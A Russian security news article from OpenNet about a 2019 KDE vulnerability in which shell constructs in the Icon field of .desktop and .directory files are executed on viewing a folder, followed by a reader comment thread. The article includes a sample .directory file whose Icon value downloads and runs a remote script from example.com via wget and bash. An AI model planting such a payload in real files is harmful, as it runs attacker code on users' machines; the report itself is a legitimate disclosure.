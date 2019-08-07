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Уязвимость в KDE, позволяющая выполнить код при просмотре списка файлов

07.08.2019 12:25

В KDE выявлена уязвимость, позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ. Проблема проявляется в актуальном выпуске библиотек KDE Frameworks 5.60.0 и более старых версиях, вплоть до KDE 4. Уязвимость пока остаётся неисправленной (CVE не присвоен).

Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функию KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды. Вопреки требованиям спецификации XDG выполнение раскрытия shell-конструкций производится без разделения типа настроек, т.е. не только при определении командной строки запускаемого приложения, но и при указании отображаемых по умолчанию пиктограмм.

Например, для атаки достаточно отправить пользователю zip-архив с каталогом, содержащим файл ".directory" вида: 



   [Desktop Entry]
   Type=Directory
   Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

При попытке просмотра содержимого архива в файловом менеджере Dolphin будет загружен и выполнен скрипт https://example.com/FILENAME.sh.



  1. Главная ссылка к новости (https://packetstormsecurity.co...)
  2. OpenNews: Уязвимость в KDE, позволяющая выполнить код при подключении внешнего носителя
  3. OpenNews: Root-уязвимость в KAuth и smb4k
  4. OpenNews: Уязвимость в GNOME Evince, позволяющая выполнить код при построении миниатюр
  5. OpenNews: Уязвимость в gnome-exe-thumbnailer, позволяющая выполнить код при просмотре каталога с MSI-файлом
  6. OpenNews: Уязвимости в GDK-Pixbuf, затрагивающие Chromium, Firefox, VLC и GNOME thumbnailer
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: kde
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  • 1.1, Аноним (1), 12:31, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +8 +/
    Это даже не autorun виндовый, это вообще дырень. Однако не все пользуются kde-шным файловым менеджером и вообще kde.  
     
     
  • 2.6, Qwerty (??), 12:35, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +12 +/
    Это даже не толстенький троллинг, это вообще жирень.
     
  • 2.11, Аноним (11), 12:51, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    >Это даже не autorun виндовый

    ну почему. Теперь это еще и autorun, еще ближе к захвату десктопов

     
  • 2.13, Вуыкло (?), 12:54, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    От безысходности, ибо больше пользоваться попросту нечем.
     
  • 2.20, анон (?), 13:09, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    kde можно поставить на винду
    получим двойной профит
     
  • 2.26, fnernfi (?), 13:20, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• –8 +/
    Бугогашеньки, слизали дизайн венды по полной, да еще и дырищи вендовые в коллекцию утянули :)
     
     
  • 3.43, Аноним (43), 15:32, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    Тyпое живoтное, это винда всю жизнь слизывала дизайн KDE.
     
  • 2.34, Корец (?), 14:14, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    >Однако не все пользуются kde-шным файловым менеджером и вообще kde.

    А вот и не правда! Я использую i3wm и pcmanfm, а это значит, что уже не все.

     
     
  • 3.36, вейланд (?), 14:19, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Прочитать и осмыслить текст могут не только лишь все.
     
     
  • 4.39, Корец (?), 14:30, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    И то верно. Тут мой косяк - прочитал через слово первый комент :(
    То просто старая привычка. Привык, что в первый комент, обычно, пишут чушь. Признаю.
     

  • 1.2, Голубой гигант (?), 12:32, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    KDE 3.5.10 из openSUSE 15.1 подвержен?
     
     
  • 2.4, Аноним (4), 12:33, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Да
     

  • 1.3, Аноним (3), 12:33, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере

    в каком? midnight commander? pcmanfm? thunar?

     
     
  • 2.7, kamagan (?), 12:39, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Видимо Dolphin, Krusader и Ark
     
  • 2.35, Аноним (35), 14:18, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    В любом KDE-шном диалоге открытия файла.
     

  • 1.5, Аноним (5), 12:34, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +5 +/
    Виндовенько.
     
     
  • 2.8, soarin (ok), 12:46, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    Когда это в венде такой примитив был?
    Или вот ещё из той же серии.
    https://kde.org/info/security/advisory-20180208-2.txt

    В вендах разве что конкретно упоролись с автозагрузкой. Когда включили её по умолчанию. Но это была фишка, которую специально сделали, хоть и <я даже не знаю как цензурно это назвать>. С выходом Vista (уже более десяти лет прошло) дошло, что это была плохая идея.

     

  • 1.9, Аноним (9), 12:46, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    Прям пыхом пахнуло. В 2019 году экранирование это всё ещё сложно?
     
     
  • 2.12, НяшМяш (ok), 12:53, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Конечно. В Qt этой функции, наверное, нет из-за сложности реализации. /sarcasm
     
     
  • 3.22, Аноним (22), 13:17, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Просто у них нет npm.
     

  • 1.10, Аноним (10), 12:50, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +3 +/
    пификсили вчера еще (в неоне), чел етот редиска канеш, но дырень огромная просто
     
  • 1.14, Аноним (-), 12:55, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    ls уязвим? Нет? Ну и ладно.
     
  • 1.15, anan (?), 12:58, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Минимум 11 лет багу
     
     
  • 2.19, Аноним (19), 13:06, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    И ведь кто-то наверняка знал!
     

  • 1.16, Аноним (16), 13:02, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –5 +/
    не страшно, КДЕ под линуксом используют только маргиналы
     
     
  • 2.23, ryoken (ok), 13:18, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    Сам дурак
     
  • 2.28, Аноним (28), 13:27, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    если кедами под линуксом пользуются только маргиналы, то кто пользуется кедами под виндами?
     
     
  • 3.37, вейланд (?), 14:20, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Пойду поставлю кеды под винду, а то я недостаточно маргинален.
     

  • 1.17, Аноним (17), 13:03, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    Какому извращенцу придет в голову искать пользователя KDE, чтобы взломать/украсть что-то? Линукс и так бесплатный, у этих людей красть то нечего.
     
     
  • 2.21, пох. (?), 13:13, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    а как же ж картинки с их камеры?

     
     
  • 3.27, soarin (ok), 13:24, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    У линуксоидов у всех залеплено... синей изолентой
     

  • 1.18, Аноним (18), 13:05, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –8 +/
    лол, дырень года
    кдешники, кстати, - латентные виндузятники, так что их не жалко
     
  • 1.24, IronMan (?), 13:18, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    В Тринити будут исправлять?
     
  • 1.25, Аноним (22), 13:19, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Самое забавное что в каком нибудь лтс кубунте этот баг никогда не исправят и там всегда будет старая багованая версия.
     
     
  • 2.44, iPony129412 (?), 15:34, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну это неправда.
    Секурные бэкпорты же есть.
     

  • 1.29, Аноним (29), 13:28, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    >Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ.

    Это что за статья????????

    -Просто запустил KDE дистр, "перетащил мышью ярлык на рабочий стол или в документ" и получил заражение???

    -Загрузил вредоносный desktop-файл от куда??? Вышел в интернет и загрузился сам???

     
  • 1.30, Ilya Indigo (ok), 13:35, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Неприятная фича.
    К счастью, директории браузер загружать не умеет и прийти такое может только из архива, а Arc-ом открывать архивы безопасно.

    Ещё, конечно, из git-а такое может прийти...

     
  • 1.31, AVX (ok), 13:45, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Вот же ппц... никогда бы не подумал что так можно обрабатывать путь к картинке... Надо дома протестировать как оно в реальности.  
     
  • 1.32, Аноним (29), 14:01, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Кто-нибудь пользуется VMware ESX?
     
     
  • 2.42, Аноним (42), 14:57, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Не ставятся на него кеды.
     

  • 1.33, Аноним (33), 14:04, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    подвержены все у кого установлен файловый менеджер Dolphin?
     
     
  • 2.38, вейланд (?), 14:22, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Любой файловый менеджер на базе kde, а также, если используются kde-шные диалоги открытия/сохранения файлов.
     

  • 1.40, Аноним (40), 14:39, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Ну хоть скрипт выполнится из под юзера, не то что гномовоский наутилус, который давал рутовские права. Хотя безрукость конечно на лицо.
     
     
  • 2.41, soarin (ok), 14:48, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    > не то что гномовоский наутилус, который давал рутовские права

    Что-то не припомню... А что, где, когда?

     
     
  • 3.46, Аноним (40), 15:44, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    https://www.opennet.ru/opennews/art.shtml?num=49871
     
  • 2.45, Аноним (45), 15:34, 07/08/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Че сказать-то хотел?
     
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